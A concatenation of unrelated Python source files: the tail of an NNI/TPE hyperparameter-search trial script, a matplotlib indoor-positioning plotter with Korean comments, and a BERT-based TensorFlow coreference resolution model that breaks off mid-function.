socket.send_pyobj({"type": "generated_parameter", "parameters": json_and_id['json_out'],
"father_id": int(json_and_id['father_id']), "parameter_id": int(nni.get_sequence_id())})
message = socket.recv_pyobj()
elif str(json_and_id['history']) == "False":
socket.send_pyobj({"type": "generated_parameter"})
message = socket.recv_pyobj()
RCV_CONFIG = json_and_id['json_out']
start_time = time.time()
with open('search_space.json') as json_file:
search_space = json.load(json_file)
min_gpu_mem = utils.MinGpuMem()
for index in range(len(search_space['batch_size']['_value'])):
search_space['batch_size']['_value'][index] *= min_gpu_mem
init_search_space_point = {"dropout_rate": 0.0, "kernel_size": 3, "batch_size": args.batch_size}
if 'father_id' in json_and_id:
json_father_id = int(json_and_id['father_id'])
while True:
if os.path.isfile(experiment_path + '/hyperparameter/' + str(json_father_id) + '.json'):
with open(experiment_path + '/hyperparameter/' + str(json_father_id) + '.json') as hp_json:
init_search_space_point = json.load(hp_json)
break
elif json_father_id > 0:
json_father_id -= 1
else:
break
train_num = 0
TPE = TPEtuner.HyperoptTuner('tpe')
TPE.update_search_space(search_space)
searched_space_point = {}
start_date = time.strftime('%m/%d/%Y, %H:%M:%S', time.localtime(time.time()))
current_json = json_and_id['json_out']
current_hyperparameter = init_search_space_point
if not os.path.isdir(experiment_path + '/hyperparameter_epoch/' + str(nni.get_trial_id())):
os.makedirs(experiment_path + '/hyperparameter_epoch/' + str(nni.get_trial_id()))
with open(experiment_path + '/hyperparameter_epoch/' + str(nni.get_trial_id()) + '/model.json', 'w') as f:
f.write(current_json)
global hp_path
hp_path = experiment_path + '/hyperparameter_epoch/' + str(nni.get_trial_id()) + '/0.json'
with open(hp_path, 'w') as f:
json.dump(
{'get_sequence_id': int(nni.get_sequence_id()), 'hyperparameter': current_hyperparameter, 'epoch': 0,
'single_acc': 0,
'train_time': 0, 'start_date': start_date}, f)
pid = os.getpid()
trial_log_path = os.environ["HOME"] + "/nni/experiments/" + str(nni.get_experiment_id()) + '/trials/' + str(
nni.get_trial_id()) + '/trial.log'
p = multiprocessing.Process(target=utils.trial_activity, args=(trial_log_path, pid,))
p.daemon = True
p.start()
single_acc, current_ep = train_eval(init_search_space_point, RCV_CONFIG, int(nni.get_sequence_id()))
print("HPO-" + str(train_num) + ",hyperparameters:" + str(init_search_space_point) + ",best_val_acc:" + str(
single_acc))
best_final = single_acc
searched_space_point = init_search_space_point
if int(nni.get_sequence_id()) > 3 * args.slave - 1:
dict_first_data = init_search_space_point
TPE.receive_trial_result(train_num, dict_first_data, single_acc)
TPEearlystop = utils.EarlyStopping(patience=3, mode="max")
for train_num in range(1, args.maxTPEsearchNum):
params = TPE.generate_parameters(train_num)
start_date = time.strftime('%m/%d/%Y, %H:%M:%S', time.localtime(time.time()))
current_hyperparameter = params
hp_path = experiment_path + '/hyperparameter_epoch/' + str(nni.get_trial_id()) + '/' + str(
train_num) + '.json'
with open(hp_path, 'w') as f:
json.dump(
{'get_sequence_id': int(nni.get_sequence_id()), 'hyperparameter': current_hyperparameter,
'epoch': 0, 'single_acc': 0,
'train_time': 0, 'start_date': start_date}, f)
single_acc, current_ep = train_eval(params, RCV_CONFIG, int(nni.get_sequence_id()))
print("HPO-" + str(train_num) + ",hyperparameters:" + str(params) + ",best_val_acc:" + str(single_acc))
TPE.receive_trial_result(train_num, params, single_acc)
if single_acc > best_final:
best_final = single_acc
searched_space_point = params
if TPEearlystop.step(single_acc):
break
nni.report_final_result(best_final, socket)
if not os.path.isdir(experiment_path + '/hyperparameter'):
os.makedirs(experiment_path + '/hyperparameter')
with open(experiment_path + '/hyperparameter/' + str(nni.get_sequence_id()) + '.json',
'w') as hyperparameter_json:
json.dump(searched_space_point, hyperparameter_json)
end_time = time.time()
with open(experiment_path + "/train_time", "w+") as f:
f.write(str(end_time - start_time))
with open(experiment_path + "/trials/" + str(nni.get_trial_id()) + "/output.log", "a+") as f:
f.write("duration=" + str(time.time() - example_start_time) + "\n")
f.write("best_acc=" + str(best_final) + "\n")
except Exception as exception:
logger.exception(exception)
raise
exit(0)
|
draw.py
|
import matplotlib.pyplot as plt
import currentlocation as loc
import time
import threading
# written by 김보라, 2020
GUI_FILE_NAME = "draw.txt"
im = plt.imread("MapDisplay.png")
#implot = plt.imshow(im)
plt.imshow(im)
MODE_FINGERPRINT = 1
MODE_KNN = 2
MODE_TRILATERATION = 3
"""
삼변측량을 하면, 지정된 영역 내에서의 위치를 알려 주니까,
해당 영역의 (0,0)에 해당하는 현실 위치를 다시 더해줘야
전체 지도 내에서의 위치를 알 수 있다.
이 때 더해주는 값이 아래와 같다.
"""
TRI_REALx_OFFSET = 14.7
TRI_REALy_OFFSET = 5.7
cnt = 0
# The top-left corner of the screen is the (0, 0) origin.
def func(mode, id, REALx, REALy):
plt.clf()
plt.imshow(im)
IMGWIDTH = 1596
REALWIDTH = 152.8
IMGHEIGHT = 462
REALHEIGHT = 44.2
if mode == MODE_TRILATERATION:
REALx += TRI_REALx_OFFSET
REALy += TRI_REALy_OFFSET
gui_x = REALx * IMGWIDTH / REALWIDTH
gui_y = REALy * IMGHEIGHT / REALHEIGHT
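    # Worked example (added): a point at the map centre, REALx = 76.4 m and
    # REALy = 22.1 m, maps to gui_x = 76.4 * 1596 / 152.8 = 798 px and
    # gui_y = 22.1 * 462 / 44.2 = 231 px, i.e. the centre of the image.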
if id == 1:
loc.aGUILocation = [gui_x, gui_y]
# print("aLocation을 업데이트 합니다.")
print(loc.aGUILocation)
elif id == 2:
loc.bGUILocation = [gui_x, gui_y]
# print("bLocation을 업데이트 합니다.")
print(loc.bGUILocation)
else:
assert False, "잘못된 ID 값입니다."
plt.plot(loc.aGUILocation[0], loc.aGUILocation[1], 'ro', alpha=0.75)
# print("plot:")
# print(loc.aGUILocation)
plt.plot(loc.bGUILocation[0], loc.bGUILocation[1], 'bo', alpha=0.75)
# print("plot:")
# print(loc.bGUILocation)
def GUI():
global cnt
GUI_FILE_NAME = "draw.txt"
time.sleep(4)
while True:
f = open(GUI_FILE_NAME, 'r')
line = f.readline()
line = line.strip()
data = str(line).split(':')
mode = int(data[0])
user_id = int(data[1])
REALx = float(data[2])
REALy = float(data[3])
f.close()
func(mode, user_id, REALx, REALy)
if cnt != 0:
print('show block')
plt.show(block=False)
time.sleep(0.2)
cnt += 1
func(1, 1, 0, 0)
func(1, 2, 0, 0)
t = threading.Thread(target=GUI)
t.start()
#while True:
# try:
plt.show()
# time.sleep(1)
# except KeyboardInterrupt:
# break
# except Exception as e:
# print(e)
# break
#print('end')
"""
func(1, 1, 29, 14.4)
print("1번 좌표 업데이트")
func(1, 2, 60.5, 17)
print("2번 좌표 업데이트")
func(1, 1, 39, 14.4)
print("1번 좌표 업데이트")
func(1, 1, 35, 14.5)
print("1번 좌표 업데이트")
func(1, 1, 32, 18.4)
print("1번 좌표 업데이트")
func(3, 2, 0, 0)
print("2번 좌표 업데이트")
"""
|
gold_mentions.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import operator
import random
import math
import json
import threading
import numpy as np
import tensorflow as tf
import h5py
import os
import sys
import util
import coref_ops
import conll
import metrics
import optimization
from bert import tokenization
from bert import modeling
class CorefModel(object):
def __init__(self, config):
self.config = config
self.max_segment_len = config['max_segment_len']
self.max_span_width = config["max_span_width"]
self.genres = { g:i for i,g in enumerate(config["genres"]) }
self.subtoken_maps = {}
self.gold = {}
self.eval_data = None # Load eval data lazily.
self.bert_config = modeling.BertConfig.from_json_file(config["bert_config_file"])
self.tokenizer = tokenization.FullTokenizer(
vocab_file=config['vocab_file'], do_lower_case=False)
input_props = []
input_props.append((tf.int32, [None, None])) # input_ids.
input_props.append((tf.int32, [None, None])) # input_mask
input_props.append((tf.int32, [None])) # Text lengths.
input_props.append((tf.int32, [None, None])) # Speaker IDs.
input_props.append((tf.int32, [])) # Genre.
input_props.append((tf.bool, [])) # Is training.
input_props.append((tf.int32, [None])) # Gold starts.
input_props.append((tf.int32, [None])) # Gold ends.
input_props.append((tf.int32, [None])) # Cluster ids.
input_props.append((tf.int32, [None])) # Sentence Map
self.queue_input_tensors = [tf.placeholder(dtype, shape) for dtype, shape in input_props]
dtypes, shapes = zip(*input_props)
queue = tf.PaddingFIFOQueue(capacity=10, dtypes=dtypes, shapes=shapes)
self.enqueue_op = queue.enqueue(self.queue_input_tensors)
self.input_tensors = queue.dequeue()
self.predictions, self.loss = self.get_predictions_and_loss(*self.input_tensors)
# bert stuff
tvars = tf.trainable_variables()
assignment_map, initialized_variable_names = modeling.get_assignment_map_from_checkpoint(tvars, config['init_checkpoint'])
tf.train.init_from_checkpoint(config['init_checkpoint'], assignment_map)
print("**** Trainable Variables ****")
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
# tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape,
# init_string)
print(" name = %s, shape = %s%s", var.name, var.shape,
init_string)
num_train_steps = int(
self.config['num_docs'] * self.config['num_epochs'])
num_warmup_steps = int(num_train_steps * 0.1)
self.global_step = tf.train.get_or_create_global_step()
self.train_op = optimization.create_custom_optimizer(tvars,
self.loss, self.config['bert_learning_rate'], self.config['task_learning_rate'],
num_train_steps, num_warmup_steps, False, self.global_step, freeze=-1)
def start_enqueue_thread(self, session):
with open(self.config["train_path"]) as f:
train_examples = [json.loads(jsonline) for jsonline in f.readlines()]
def _enqueue_loop():
while True:
random.shuffle(train_examples)
if self.config['single_example']:
for example in train_examples:
tensorized_example = self.tensorize_example(example, is_training=True)
feed_dict = dict(zip(self.queue_input_tensors, tensorized_example))
session.run(self.enqueue_op, feed_dict=feed_dict)
else:
examples = []
for example in train_examples:
tensorized = self.tensorize_example(example, is_training=True)
if type(tensorized) is not list:
tensorized = [tensorized]
examples += tensorized
random.shuffle(examples)
print('num examples', len(examples))
for example in examples:
feed_dict = dict(zip(self.queue_input_tensors, example))
session.run(self.enqueue_op, feed_dict=feed_dict)
enqueue_thread = threading.Thread(target=_enqueue_loop)
enqueue_thread.daemon = True
enqueue_thread.start()
def restore(self, session):
# Don't try to restore unused variables from the TF-Hub ELMo module.
vars_to_restore = [v for v in tf.global_variables() ]
saver = tf.train.Saver(vars_to_restore)
checkpoint_path = os.path.join(self.config["log_dir"], "model.max.ckpt")
print("Restoring from {}".format(checkpoint_path))
session.run(tf.global_variables_initializer())
saver.restore(session, checkpoint_path)
def tensorize_mentions(self, mentions):
if len(mentions) > 0:
starts, ends = zip(*mentions)
else:
starts, ends = [], []
return np.array(starts), np.array(ends)
def tensorize_span_labels(self, tuples, label_dict):
if len(tuples) > 0:
starts, ends, labels = zip(*tuples)
else:
starts, ends, labels = [], [], []
return np.array(starts), np.array(ends), np.array([label_dict[c] for c in labels])
def get_speaker_dict(self, speakers):
speaker_dict = {'UNK': 0, '[SPL]': 1}
for s in speakers:
if s not in speaker_dict and len(speaker_dict) < self.config['max_num_speakers']:
speaker_dict[s] = len(speaker_dict)
return speaker_dict
def tensorize_example(self, example, is_training):
clusters = example["clusters"]
gold_mentions = sorted(tuple(m) for m in util.flatten(clusters))
gold_mention_map = {m:i for i,m in enumerate(gold_mentions)}
cluster_ids = np.zeros(len(gold_mentions))
for cluster_id, cluster in enumerate(clusters):
for mention in cluster:
cluster_ids[gold_mention_map[tuple(mention)]] = cluster_id + 1
sentences = example["sentences"]
num_words = sum(len(s) for s in sentences)
speakers = example["speakers"]
# assert num_words == len(speakers), (num_words, len(speakers))
speaker_dict = self.get_speaker_dict(util.flatten(speakers))
sentence_map = example['sentence_map']
max_sentence_length = self.max_segment_len
text_len = np.array([len(s) for s in sentences])
input_ids, input_mask, speaker_ids = [], [], []
for i, (sentence, speaker) in enumerate(zip(sentences, speakers)):
sent_input_ids = self.tokenizer.convert_tokens_to_ids(sentence)
sent_input_mask = [1] * len(sent_input_ids)
sent_speaker_ids = [speaker_dict.get(s, 3) for s in speaker]
while len(sent_input_ids) < max_sentence_length:
sent_input_ids.append(0)
sent_input_mask.append(0)
sent_speaker_ids.append(0)
input_ids.append(sent_input_ids)
speaker_ids.append(sent_speaker_ids)
input_mask.append(sent_input_mask)
input_ids = np.array(input_ids)
input_mask = np.array(input_mask)
speaker_ids = np.array(speaker_ids)
assert num_words == np.sum(input_mask), (num_words, np.sum(input_mask))
# speaker_dict = { s:i for i,s in enumerate(set(speakers)) }
# speaker_ids = np.array([speaker_dict[s] for s in speakers])
doc_key = example["doc_key"]
self.subtoken_maps[doc_key] = example["subtoken_map"]
self.gold[doc_key] = example["clusters"]
genre = self.genres.get(doc_key[:2], 0)
gold_starts, gold_ends = self.tensorize_mentions(gold_mentions)
example_tensors = (input_ids, input_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map)
if is_training and len(sentences) > self.config["max_training_sentences"]:
if self.config['single_example']:
return self.truncate_example(*example_tensors)
else:
offsets = range(self.config['max_training_sentences'], len(sentences), self.config['max_training_sentences'])
tensor_list = [self.truncate_example(*(example_tensors + (offset,))) for offset in offsets]
return tensor_list
else:
return example_tensors
def truncate_example(self, input_ids, input_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map, sentence_offset=None):
max_training_sentences = self.config["max_training_sentences"]
num_sentences = input_ids.shape[0]
assert num_sentences > max_training_sentences
sentence_offset = random.randint(0, num_sentences - max_training_sentences) if sentence_offset is None else sentence_offset
word_offset = text_len[:sentence_offset].sum()
num_words = text_len[sentence_offset:sentence_offset + max_training_sentences].sum()
input_ids = input_ids[sentence_offset:sentence_offset + max_training_sentences, :]
input_mask = input_mask[sentence_offset:sentence_offset + max_training_sentences, :]
speaker_ids = speaker_ids[sentence_offset:sentence_offset + max_training_sentences, :]
text_len = text_len[sentence_offset:sentence_offset + max_training_sentences]
sentence_map = sentence_map[word_offset: word_offset + num_words]
gold_spans = np.logical_and(gold_ends >= word_offset, gold_starts < word_offset + num_words)
gold_starts = gold_starts[gold_spans] - word_offset
gold_ends = gold_ends[gold_spans] - word_offset
cluster_ids = cluster_ids[gold_spans]
return input_ids, input_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map
def get_candidate_labels(self, candidate_starts, candidate_ends, labeled_starts, labeled_ends, labels):
same_start = tf.equal(tf.expand_dims(labeled_starts, 1), tf.expand_dims(candidate_starts, 0)) # [num_labeled, num_candidates]
same_end = tf.equal(tf.expand_dims(labeled_ends, 1), tf.expand_dims(candidate_ends, 0)) # [num_labeled, num_candidates]
same_span = tf.logical_and(same_start, same_end) # [num_labeled, num_candidates]
candidate_labels = tf.matmul(tf.expand_dims(labels, 0), tf.to_int32(same_span)) # [1, num_candidates]
candidate_labels = tf.squeeze(candidate_labels, 0) # [num_candidates]
return candidate_labels
def get_dropout(self, dropout_rate, is_training):
return 1 - (tf.to_float(is_training) * dropout_rate)
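  # Note (added): the value above is the keep probability passed to
  # tf.nn.dropout — 1 - dropout_rate while training, and 1.0 at eval time.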
def coarse_to_fine_pruning(self, top_span_emb, top_span_mention_scores, c):
k = util.shape(top_span_emb, 0)
top_span_range = tf.range(k) # [k]
antecedent_offsets = tf.expand_dims(top_span_range, 1) - tf.expand_dims(top_span_range, 0) # [k, k]
antecedents_mask = antecedent_offsets >= 1 # [k, k]
fast_antecedent_scores = tf.expand_dims(top_span_mention_scores, 1) + tf.expand_dims(top_span_mention_scores, 0) # [k, k]
fast_antecedent_scores += tf.log(tf.to_float(antecedents_mask)) # [k, k]
fast_antecedent_scores += self.get_fast_antecedent_scores(top_span_emb) # [k, k]
if self.config['use_prior']:
antecedent_distance_buckets = self.bucket_distance(antecedent_offsets) # [k, c]
distance_scores = util.projection(tf.nn.dropout(tf.get_variable("antecedent_distance_emb", [10, self.config["feature_size"]]), self.dropout), 1, initializer=tf.truncated_normal_initializer(stddev=0.02)) #[10, 1]
antecedent_distance_scores = tf.gather(tf.squeeze(distance_scores, 1), antecedent_distance_buckets) # [k, c]
fast_antecedent_scores += antecedent_distance_scores
_, top_antecedents = tf.nn.top_k(fast_antecedent_scores, c, sorted=False) # [k, c]
top_antecedents_mask = util.batch_gather(antecedents_mask, top_antecedents) # [k, c]
top_fast_antecedent_scores = util.batch_gather(fast_antecedent_scores, top_antecedents) # [k, c]
top_antecedent_offsets = util.batch_gather(antecedent_offsets, top_antecedents) # [k, c]
return top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets
def get_predictions_and_loss(self, input_ids, input_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map):
model = modeling.BertModel(
config=self.bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
use_one_hot_embeddings=False,
scope='bert')
all_encoder_layers = model.get_all_encoder_layers()
mention_doc = model.get_sequence_output()
self.dropout = self.get_dropout(self.config["dropout_rate"], is_training)
num_sentences = tf.shape(mention_doc)[0]
max_sentence_length = tf.shape(mention_doc)[1]
mention_doc = self.flatten_emb_by_sentence(mention_doc, input_mask)
num_words = util.shape(mention_doc, 0)
antecedent_doc = mention_doc
flattened_sentence_indices = sentence_map
candidate_starts, candidate_ends = tf.clip_by_value(tf.concat([gold_starts, [0]], -1), 0, num_words-1), tf.clip_by_value(tf.concat([gold_ends, [0]], -1), 0, num_words-1)
#candidate_ends = tf.Print(candidate_ends, [candidate_ends])
candidate_cluster_ids = self.get_candidate_labels(candidate_starts, candidate_ends, gold_starts, gold_ends, cluster_ids) # [num_candidates]
candidate_span_emb = self.get_span_emb(mention_doc, mention_doc, candidate_starts, candidate_ends) # [num_candidates, emb]
candidate_mention_scores = self.get_mention_scores(candidate_span_emb, candidate_starts, candidate_ends)
candidate_mention_scores = tf.squeeze(candidate_mention_scores, 1) # [k]
# beam size
k = tf.minimum(3900, tf.to_int32(tf.floor(tf.to_float(num_words) * self.config["top_span_ratio"])))
c = tf.minimum(self.config["max_top_antecedents"], k)
# pull from beam
top_span_indices = coref_ops.extract_spans(tf.expand_dims(candidate_mention_scores, 0),
tf.expand_dims(candidate_starts, 0),
tf.expand_dims(candidate_ends, 0),
tf.expand_dims(k, 0),
num_words,
True) # [1, k]
top_span_indices.set_shape([1, None])
top_span_indices = tf.squeeze(top_span_indices, 0) # [k]
top_span_starts = tf.gather(candidate_starts, top_span_indices) # [k]
top_span_ends = tf.gather(candidate_ends, top_span_indices) # [k]
top_span_emb = tf.gather(candidate_span_emb, top_span_indices) # [k, emb]
top_span_cluster_ids = tf.gather(candidate_cluster_ids, top_span_indices) # [k]
top_span_mention_scores = tf.gather(candidate_mention_scores, top_span_indices) # [k]
genre_emb = tf.gather(tf.get_variable("genre_embeddings", [len(self.genres), self.config["feature_size"]]), genre) # [emb]
if self.config['use_metadata']:
speaker_ids = self.flatten_emb_by_sentence(speaker_ids, input_mask)
top_span_speaker_ids = tf.gather(speaker_ids, top_span_starts) # [k]i
else:
top_span_speaker_ids = None
dummy_scores = tf.zeros([k, 1]) # [k, 1]
top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets = self.coarse_to_fine_pruning(top_span_emb, top_span_mention_scores, c)
num_segs, seg_len = util.shape(input_ids, 0), util.shape(input_ids, 1)
word_segments = tf.tile(tf.expand_dims(tf.range(0, num_segs), 1), [1, seg_len])
flat_word_segments = tf.boolean_mask(tf.reshape(word_segments, [-1]), tf.reshape(input_mask, [-1]))
mention_segments = tf.expand_dims(tf.gather(flat_word_segments, top_span_starts), 1) # [k, 1]
antecedent_segments = tf.gather(flat_word_segments, tf.gather(top_span_starts, top_antecedents)) #[k, c]
segment_distance = tf.clip_by_value(mention_segments - antecedent_segments, 0, self.config['max_training_sentences'] - 1) if self.config['use_segment_distance'] else None #[k, c]
if self.config['fine_grained']:
for i in range(self.config["coref_depth"]):
with tf.variable_scope("coref_layer", reuse=(i > 0)):
top_antecedent_emb = tf.gather(top_span_emb, top_antecedents) # [k, c, emb]
top_antecedent_scores = top_fast_antecedent_scores + self.get_slow_antecedent_scores(top_span_emb, top_antecedents, top_antecedent_emb, top_antecedent_offsets, top_span_speaker_ids, genre_emb, segment_distance) # [k, c]
top_antecedent_weights = tf.nn.softmax(tf.concat([dummy_scores, top_antecedent_scores], 1)) # [k, c + 1]
top_antecedent_emb = tf.concat([tf.expand_dims(top_span_emb, 1), top_antecedent_emb], 1) # [k, c + 1, emb]
attended_span_emb = tf.reduce_sum(tf.expand_dims(top_antecedent_weights, 2) * top_antecedent_emb, 1) # [k, emb]
with tf.variable_scope("f"):
f = tf.sigmoid(util.projection(tf.concat([top_span_emb, attended_span_emb], 1), util.shape(top_span_emb, -1))) # [k, emb]
top_span_emb = f * attended_span_emb + (1 - f) * top_span_emb # [k, emb]
else:
top_antecedent_scores = top_fast_antecedent_scores
top_antecedent_scores = tf.concat([dummy_scores, top_antecedent_scores], 1) # [k, c + 1]
top_antecedent_cluster_ids = tf.gather(top_span_cluster_ids, top_antecedents) # [k, c]
top_antecedent_cluster_ids += tf.to_int32(tf.log(tf.to_float(top_antecedents_mask))) # [k, c]
same_cluster_indicator = tf.equal(top_antecedent_cluster_ids, tf.expand_dims(top_span_cluster_ids, 1)) # [k, c]
non_dummy_indicator = tf.expand_dims(top_span_cluster_ids > 0, 1) # [k, 1]
pairwise_labels = tf.logical_and(same_cluster_indicator, non_dummy_indicator) # [k, c]
dummy_labels = tf.logical_not(tf.reduce_any(pairwise_labels, 1, keepdims=True)) # [k, 1]
top_antecedent_labels = tf.concat([dummy_labels, pairwise_labels], 1) # [k, c + 1]
loss = self.softmax_loss(top_antecedent_scores, top_antecedent_labels) # [k]
loss = tf.reduce_sum(loss) # []
return [candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends, top_antecedents, top_antecedent_scores], loss
def get_span_emb(self, head_emb, context_outputs, span_starts, span_ends):
span_emb_list = []
span_start_emb = tf.gather(context_outputs, span_starts) # [k, emb]
span_emb_list.append(span_start_emb)
span_end_emb = tf.gather(context_outputs, span_ends) # [k, emb]
span_emb_list.append(span_end_emb)
span_width = 1 + span_ends - span_starts # [k]
if self.config["use_features"]:
span_width_index = span_width - 1 # [k]
span_width_emb = tf.gather(tf.get_variable("span_width_embeddings", [self.config["max_span_width"], self.config["feature_size"]]), span_width_index) # [k, emb]
span_width_emb = tf.nn.dropout(span_width_emb, self.dropout)
span_emb_list.append(span_width_emb)
if self.config["model_heads"]:
mention_word_scores = self.get_masked_mention_word_scores(context_outputs, span_starts, span_ends)
head_attn_reps = tf.matmul(mention_word_scores, context_outputs) # [K, T]
span_emb_list.append(head_attn_reps)
span_emb = tf.concat(span_emb_list, 1) # [k, emb]
return span_emb # [k, emb]
def get_mention_scores(self, span_emb, span_starts, span_ends):
with tf.variable_scope("mention_scores"):
span_scores = util.ffnn(span_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [k, 1]
if self.config['use_prior']:
span_width_emb = tf.get_variable("span_width_prior_embeddings", [self.config["max_span_width"], self.config["feature_size"]]) # [W, emb]
span_width_index = span_ends - span_starts # [NC]
with tf.variable_scope("width_scores"):
width_scores = util.ffnn(span_width_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [W, 1]
width_scores = tf.gather(width_scores, span_width_index)
span_scores += width_scores
return span_scores
def get_width_scores(self, doc, starts, ends):
distance = ends - starts
span_start_emb = tf.gather(doc, starts)
hidden = util.shape(doc, 1)
with tf.variable_scope('span_width'):
span_width_emb = tf.gather(tf.get_variable("start_width_embeddings", [self.config["max_span_width"], hidden], initializer=tf.truncated_normal_initializer(stddev=0.02)), distance) # [W, emb]
scores = tf.reduce_sum(span_start_emb * span_width_emb, axis=1)
return scores
def get_masked_mention_word_scores(self, encoded_doc, span_starts, span_ends):
num_words = util.shape(encoded_doc, 0) # T
num_c = util.shape(span_starts, 0) # NC
doc_range = tf.tile(tf.expand_dims(tf.range(0, num_words), 0), [num_c, 1]) # [K, T]
mention_mask = tf.logical_and(doc_range >= tf.expand_dims(span_starts, 1), doc_range <= tf.expand_dims(span_ends, 1)) #[K, T]
with tf.variable_scope("mention_word_attn"):
word_attn = tf.squeeze(util.projection(encoded_doc, 1, initializer=tf.truncated_normal_initializer(stddev=0.02)), 1)
mention_word_attn = tf.nn.softmax(tf.log(tf.to_float(mention_mask)) + tf.expand_dims(word_attn, 0))
return mention_word_attn
def softmax_loss(self, antecedent_scores, antecedent_labels):
gold_scores = antecedent_scores + tf.log(tf.to_float(antecedent_labels)) # [k, max_ant + 1]
marginalized_gold_scores = tf.reduce_logsumexp(gold_scores, [1]) # [k]
log_norm = tf.reduce_logsumexp(antecedent_scores, [1]) # [k]
return log_norm - marginalized_gold_scores # [k]
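  # Note (added): this is the standard marginal log-likelihood coreference
  # loss — log-sum-exp over all antecedent scores minus log-sum-exp over the
  # gold antecedents only.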
def bucket_distance(self, distances):
"""
Places the given values (designed for distances) into 10 semi-logscale buckets:
[0, 1, 2, 3, 4, 5-7, 8-15, 16-31, 32-63, 64+].
"""
logspace_idx = tf.to_int32(tf.floor(tf.log(tf.to_float(distances))/math.log(2))) + 3
use_identity = tf.to_int32(distances <= 4)
combined_idx = use_identity * distances + (1 - use_identity) * logspace_idx
return tf.clip_by_value(combined_idx, 0, 9)
def get_slow_antecedent_scores(self, top_span_emb, top_antecedents, top_antecedent_emb, top_antecedent_offsets, top_span_speaker_ids, genre_emb, segment_distance=None):
k = util.shape(top_span_emb, 0)
c = util.shape(top_antecedents, 1)
feature_emb_list = []
if self.config["use_metadata"]:
top_antecedent_speaker_ids = tf.gather(top_span_speaker_ids, top_antecedents) # [k, c]
same_speaker = tf.equal(tf.expand_dims(top_span_speaker_ids, 1), top_antecedent_speaker_ids) # [k, c]
speaker_pair_emb = tf.gather(tf.get_variable("same_speaker_emb", [2, self.config["feature_size"]]), tf.to_int32(same_speaker)) # [k, c, emb]
feature_emb_list.append(speaker_pair_emb)
tiled_genre_emb = tf.tile(tf.expand_dims(tf.expand_dims(genre_emb, 0), 0), [k, c, 1]) # [k, c, emb]
feature_emb_list.append(tiled_genre_emb)
if self.config["use_features"]:
antecedent_distance_buckets = self.bucket_distance(top_antecedent_offsets) # [k, c]
antecedent_distance_emb = tf.gather(tf.get_variable("antecedent_distance_emb", [10, self.config["feature_size"]]), antecedent_distance_buckets) # [k, c]
feature_emb_list.append(antecedent_distance_emb)
if segment_distance is not None:
with tf.variable_scope('segment_distance', reuse=tf.AUTO_REUSE):
segment_distance_emb = tf.gather(tf.get_variable("segment_distance_embeddings", [self.config['max_training_sentences'], self.config["feature_size"]]), segment_distance) # [k, emb]
span_width_emb = tf.nn.dropout(segment_distance_emb, self.dropout)
feature_emb_list.append(segment_distance_emb)
feature_emb = tf.concat(feature_emb_list, 2) # [k, c, emb]
feature_emb = tf.nn.dropout(feature_emb, self.dropout) # [k, c, emb]
target_emb = tf.expand_dims(top_span_emb, 1) # [k, 1, emb]
similarity_emb = top_antecedent_emb * target_emb # [k, c, emb]
target_emb = tf.tile(target_emb, [1, c, 1]) # [k, c, emb]
pair_emb = tf.concat([target_emb, top_antecedent_emb, similarity_emb, feature_emb], 2) # [k, c, emb]
with tf.variable_scope("slow_antecedent_scores"):
slow_antecedent_scores = util.ffnn(pair_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [k, c, 1]
slow_antecedent_scores = tf.squeeze(slow_antecedent_scores, 2) # [k, c]
return slow_antecedent_scores # [k, c]
def get_fast_antecedent_scores(self, top_span_emb):
with tf.variable_scope("src_projection"):
source_top_span_emb = tf.nn.dropout(util.projection(top_span_emb, util.shape(top_span_emb, -1)), self.dropout) # [k, emb]
target_top_span_emb = tf.nn.dropout(top_span_emb, self.dropout) # [k, emb]
return tf.matmul(source_top_span_emb, target_top_span_emb, transpose_b=True) # [k, k]
def flatten_emb_by_sentence(self, emb, text_len_mask):
num_sentences = tf.shape(emb)[0]
max_sentence_length = tf.shape(emb)[1]
emb_rank = len(emb.get_shape())
if emb_rank == 2:
flattened_emb = tf.reshape(emb, [num_sentences * max_sentence_length])
elif emb_rank == 3:
flattened_emb = tf.reshape(emb, [num_sentences * max_sentence_length, util.shape(emb, 2)])
else:
raise ValueError("Unsupported rank: {}".format(emb_rank))
return tf.boolean_mask(flattened_emb, tf.reshape(text_len_mask, [num_sentences * max_sentence_length]))
def get_predicted_antecedents(self, antecedents, antecedent_scores):
predicted_antecedents = []
for i, index in enumerate(np.argmax(antecedent_scores, axis=1) - 1):
if index < 0:
predicted_antecedents.append(-1)
else:
predicted_antecedents.append(antecedents[i, index])
return predicted_antecedents
def get_predicted_clusters(self, top_span_starts, top_span_ends, predicted_antecedents):
mention_to_predicted = {}
predicted_clusters = []
for i, predicted_index in enumerate(predicted_antecedents):
if predicted_index < 0:
continue
assert i > predicted_index, (i, predicted_index)
predicted_antecedent = (int(top_span_starts[predicted_index]), int(top_span_ends[predicted_index]))
if predicted_antecedent in mention_to_predicted:
predicted_cluster = mention_to_predicted[predicted_antecedent]
else:
predicted_cluster = len(predicted_clusters)
predicted_clusters.append([predicted_antecedent])
mention_to_predicted[predicted_antecedent] = predicted_cluster
mention = (int(top_span_starts[i]), int(top_span_ends[i]))
predicted_clusters[predicted_cluster].append(mention)
mention_to_predicted[mention] = predicted_cluster
predicted_clusters = [tuple(pc) for pc in predicted_clusters]
mention_to_predicted = { m:predicted_clusters[i] for m,i in mention_to_predicted.items() }
return predicted_clusters, mention_to_predicted
def evaluate_coref(self, top_span_starts, top_span_ends, predicted_antecedents, gold_clusters, evaluator):
gold_clusters = [tuple(tuple(m) for m in gc) for gc in gold_clusters]
mention_to_gold = {}
for gc in gold_clusters:
for mention in gc:
mention_to_gold[mention] = gc
predicted_clusters, mention_to_predicted = self.get_predicted_clusters(top_span_starts, top_span_ends, predicted_antecedents)
